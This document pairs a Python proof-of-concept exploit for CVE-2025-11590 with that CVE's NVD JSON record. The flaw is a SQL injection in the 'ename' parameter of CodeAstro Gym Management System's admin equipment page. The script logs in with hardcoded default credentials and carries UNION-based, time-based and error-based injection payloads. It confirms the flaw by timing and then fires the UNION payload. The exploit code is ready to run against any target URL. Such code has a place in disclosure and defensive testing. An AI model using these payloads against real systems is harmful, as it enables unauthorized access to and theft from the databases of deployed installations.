CVE-2025-11590

# CVE-2025-11590 - CodeAstro Gym Management System SQL Injection PoC # Vulnerability: SQL Injection in /admin/equipment-entry.php via 'ename' parameter # CVSS: 6.3 (MEDIUM) import requests import sys # Target configuration TARGET_URL = "http://target.com" ADMIN_PATH = "/admin/equipment-entry.php" USERNAME = "admin" PASSWORD = "admin123" # Create a session to maintain cookies session = requests.Session() def login(base_url, username, password): """Login to admin panel to obtain low-privilege access""" login_url = f"{base_url}/admin/" # Attempt login with default or known credentials data = { "username": username, "password": password } response = session.post(login_url, data=data, allow_redirects=True) return response def exploit_sql_injection(base_url): """Exploit SQL injection in ename parameter""" target_url = f"{base_url}{ADMIN_PATH}" # SQL Injection payload - UNION based injection to extract database info # Adjust column count based on the original query payload = "Test' UNION SELECT 1,2,3,4,5,6,7,8,9,10-- -" # Alternative time-based blind injection payload time_based_payload = "Test' AND SLEEP(5)-- -" # Alternative error-based payload error_based_payload = "Test' AND (SELECT 1 FROM (SELECT COUNT(*),CONCAT((SELECT database()),0x3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.tables GROUP BY x)a)-- -" data = { "ename": payload, # Add other required form fields "submit": "" } response = session.post(target_url, data=data) if response.status_code == 200: print(f"[+] Response length: {len(response.text)}") # Check for SQL error messages or data leakage if "error" in response.text.lower() or "sql" in response.text.lower(): print("[+] Possible SQL injection detected!") print(response.text[:500]) return response def check_vulnerability(base_url): """Quick vulnerability check using time-based blind injection""" target_url = f"{base_url}{ADMIN_PATH}" # Normal request timing import time start = time.time() normal_data = {"ename": "test_equipment", "submit": ""} session.post(target_url, data=normal_data) normal_time = time.time() - start # Time-based injection request start = time.time() inject_data = {"ename": "test' AND SLEEP(3)-- -", "submit": ""} session.post(target_url, data=inject_data) inject_time = time.time() - start if inject_time - normal_time > 2: print(f"[+] Vulnerability confirmed! Time difference: {inject_time - normal_time:.2f}s") return True else: print("[-] Target may not be vulnerable") return False if __name__ == "__main__": if len(sys.argv) > 1: TARGET_URL = sys.argv[1] print(f"[*] Target: {TARGET_URL}") print("[*] Logging in...") login(TARGET_URL, USERNAME, PASSWORD) print("[*] Checking vulnerability...") if check_vulnerability(TARGET_URL): print("[*] Exploiting...") exploit_sql_injection(TARGET_URL)

{"cve": {"id": "CVE-2025-11590", "sourceIdentifier": "[email protected]", "published": "2025-10-11T01:15:32.757", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "A weakness has been identified in CodeAstro Gym Management System 1.0. Affected by this vulnerability is an unknown functionality of the file /admin/equipment-entry.php. Executing a manipulation of the argument ename can lead to sql injection. It is possible to launch the attack remotely. The exploit has been made available to the public and could be used for attacks."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 2.1, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L", "baseScore": 6.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 3.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "baseScore": 6.5, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "SINGLE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL"}, "baseSeverity": "MEDIUM", "exploitabilityScore": 8.0, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-74"}, {"lang": "en", "value": "CWE-89"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-89"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:codeastro:gym_management_system:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "4BDAFA95-39E9-4D93-9228-7D9B51DE6A3F"}]}]}], "references": [{"url": "https://codeastro.com/", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://github.com/coppeliaz/cve/issues/3", "source": "[email protected]", "tags": ["Exploit", "Issue Tracking", "Third Party Advisory"]}, {"url": "https://vuldb.com/?ctiid.327911", "source": "[email protected]", "tags": ["Permissions Required", "VDB Entry"]}, {"url": "https://vuldb.com/?id.327911", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://vuldb.com/?submit.671738", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://github.com/coppeliaz/cve/issues/3", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Issue Tracking", "Third Party Advisory"]}]}}